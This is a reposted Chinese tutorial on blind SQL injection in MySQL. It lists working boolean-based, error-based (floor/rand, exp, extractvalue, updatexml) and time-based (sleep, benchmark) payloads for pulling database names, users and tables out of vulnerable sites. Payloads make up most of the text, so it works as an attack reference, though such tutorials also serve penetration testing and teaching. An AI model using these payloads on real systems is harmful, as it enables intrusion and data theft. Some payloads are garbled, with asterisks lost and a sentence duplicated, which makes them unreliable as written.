[转载]盲注的讲解

[转载]盲注的讲解

何为盲注？盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。盲注分为三类：

•基于布尔SQL盲注

•基于时间的SQL盲注

•基于报错的SQL盲注

基于布尔SQL盲注——构造逻辑判断

在sql注入中，往往会用到截取字符串的问题，例如不回显的情况下进行的注入，也成为盲注，这种情况下往往需要一个一个字符的去猜解，过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明，其他类型数据库请自行检测。

三大法宝：mid(),substr(),left()

substr()函数

Substr()和substring()函数实现的功能是一样的，均为截取字符串。

string substring(string, start, length)

string substr(string, start, length)

参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度。

Sql用例：

(1) substr(DATABASE(),1,1)>’a’,查看数据库名第一位，substr(DATABASE(),2,1)查看数据库名第二位，依次查看各位字符。

(2) substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处string参数可以为sql语句，可自行构造sql语句进行注入。

Left()函数

Left()得到字符串左部指定个数的字符

Left ( string, n ) string为要截取的字符串，n为长度。

Sql用例：

(1) left(database(),1)>’a’,查看数据库名第一位，left(database(),2)>’ab’,查看数据库名前二位。

(2) 同样的string可以为自行构造的sql语句。

同时也要介绍ORD()函数，此函数为返回第一个字符的ASCII码，经常与上面的函数进行组合使用。

例如ORD(MID(DATABASE(),1,1))>114 意为检测database()的第一位ASCII码是否大于114，也即是‘r’

regexp正则注入

正则注入介绍：https://www.cnblogs.com/cany/p/10747081.html

用法介绍：select user() regexp ‘^[a-z]’;

Explain：正则表达式的用法，user()结果为root，regexp为匹配root的正则表达式。

第二位可以用select user() regexp ‘^ro’来进行。

当正确的时候显示结果为1，不正确的时候显示结果为0.

示例介绍：

I select * from users where id=1 and 1=(if((user() regexp ‘^r’),1,0));

II select * from users where id=1 and 1=(user() regexp’^ri’);

通过if语句的条件判断，返回一些条件句，比如if等构造一个判断。根据返回结果是否等于0或者1进行判断。

III select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema=’security’ and table_name regexp ‘^us[a-z]’ limit 0,1);

这里利用select构造了一个判断语句。我们只需要更换regexp表达式即可

‘^u[a-z]’ -> ‘^us[a-z]’ -> ‘^use[a-z]’ -> ‘^user[a-z]’ -> FALSE

如何知道匹配结束了？这里大部分根据一般的命名方式（经验）就可以判断。但是如何你在无法判断的情况下，可以用table_name regexp ‘^username′来进行判断。是从开头进行匹配，′来进行判断。是从开头进行匹配，是从结尾开始判断。更多的语法可以参考mysql使用手册进行了解。

好，这里思考一个问题？table_name有好几个，我们只得到了一个user，如何知道其他的？

这里可能会有人认为使用limit 0，1改为limit 1,1。

但是这种做法是错误的，limit作用在前面的select语句中，而不是regexp。那我们该如何选择。其实在regexp中我们是取匹配table_name中的内容，只要table_name中有的内容，我们用regexp都能够匹配到。因此上述语句不仅仅可以选择user，还可以匹配其他项。

like匹配注入

和上述的正则类似，mysql在匹配的时候我们可以用ike进行匹配。

用法：select user() like ‘ro%’

基于报错的SQL盲注——构造payload让信息通过错误提示回显出来

select 1,count(),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)2))a from information_schema.columns group by a;

//explain:此处有三个点，一是需要concat计数，二是floor，取得0 or 1，进行数据的重复，三是group by进行分组，但具体原理解释不是很通，大致原理为分组后数据计数时重复造成的错误。也有解释为mysql 的bug 的问题。但是此处需要将rand(0)，rand()需要多试几次才行。

以上语句可以简化成如下的形式。

select count() from information_schema.tables group by concat(version(),floor(rand(0)2))

如果关键的表被禁用了，可以使用这种形式

select count(*) from (select 1 union select null union

select !1) group by concat(version(),floor(rand(0)*2))

如果rand被禁用了可以使用用户变量来报错

select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

select exp(~(select * FROM(SELECT USER())a)) //double数值类型超出范围
//Exp()为以e为底的对数函数；版本在5.5.5及其以上

可以参考exp报错文章：http://www.cnblogs.com/lcamry/articles/5509124.html

select !(select * from (select user())x) -（ps:这是减号） ~0

//bigint超出范围；~0是对0逐位取反，很大的版本在5.5.5及其以上

可以参考文章bigint溢出文章http://www.cnblogs.com/lcamry/articles/5509112.html

extractvalue(1,concat(0x7e,(select @@version),0x7e)) se//mysql对xml数据进行查询和修改的xpath函数，xpath语法错误

updatexml(1,concat(0x7e,(select @@version),0x7e),1) //mysql对xml数据进行查询和修改的xpath函数，xpath语法错误

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

//mysql重复特性，此处重复了version，所以报错。

基于时间的SQL盲注———-延时注入

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if判断语句，条件为假，执行sleep

Ps：遇到以下这种利用sleep()延时注入语句

select sleep(find_in_set(mid(@@version, 1, 1), ‘0,1,2,3,4,5,6,7,8,9,.’));
该语句意思是在0-9之间找版本号的第一位。但是在我们实际渗透过程中，这种用法是不可取的，因为时间会有网速等其他因素的影响，所以会影响结果的判断。

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘MSG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;

//BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的cpu资源。推荐使用sleep()函数进行注入。